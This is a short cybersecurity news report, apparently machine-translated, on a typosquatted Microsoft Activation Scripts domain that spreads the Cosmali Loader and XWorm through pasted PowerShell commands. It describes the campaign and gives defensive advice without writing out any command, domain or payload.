Shutterstock
In summary
- Hackers exploit a simple typo in a web address almost identical to that of the Microsoft Activation Scripts to install crypto-mining software or Trojans for remote control of the PC.
- To defend yourself, experts recommend avoiding scripts of uncertain origin, verifying every domain and command typed with extreme care and, preferably, using only legitimate software licenses.
According to the experts of IT security a simple typo can turn into a very serious problem thanks to a malicious campaign that exploits a fake Windows activation page to spread malware through PowerShell. The target is the users who resort to Unofficial activation scriptsoften convinced that they are carrying out a relatively harmless operation and instead exposed to profound system compromises.
How this new cyber attack works
From what we know, hackers use so-called Microsoft Activation Scripts (MAS), an open source collection of PowerShell scripts used for activate Windows and Office without a valid license. The attack mechanism is as simple as it is effective and instead of the legitimate domain used by the project, an almost identical address is proposed, differing by only one letter. A minimal variation, typical of typosquatting but sufficient to divert traffic to servers controlled by digital attackers.
The moment the user manually copies or types the PowerShell command with the wrong domain, the script downloads and executes malicious codestarting the infection without any obvious signs.
In recent times the threat has spread like wildfire and several users have reported on the forums and on Reddit the appearance of anomalous alerts on your computers. The messages signaled the presence of the Cosmali Loadera modular malware designed to act as a vector for further infections. Once installed, the loader is able to download and launch add-ons, including software di crypto-mining e remote access trojan come XWormgiving attackers extensive control over compromised systems.
How to defend yourself from this threat
Since this is a rapidly expanding cyber threat, cyber security experts invite you to check every command performed extremely carefully ea Don’t launch PowerShell scripts without knowing its source. Manually typing commands, in particular, significantly increases the risk of falling into traps based on manipulated domains.
Furthermore, this episode brings back into the spotlight a problem that has been known for years, that of unofficial activation tools which represent a privileged channel for the dissemination of malware. For users the danger is twofold. On the one hand there is the legal aspect linked to the use of unlicensed software and on the other, even more concrete, there is cybersecurity risk. Seemingly harmless scripts can turn into vehicles for complex infections that are difficult to detect and remove.
In fact, those who continue to use these tools should at least understand how they work, test them in isolated environments and pay maximum attention to domains and commands. This incident, therefore, demonstrates how thin the line is between a shortcut to activate Windows and a serious security problem, capable of compromising entire operating systems in a few seconds.
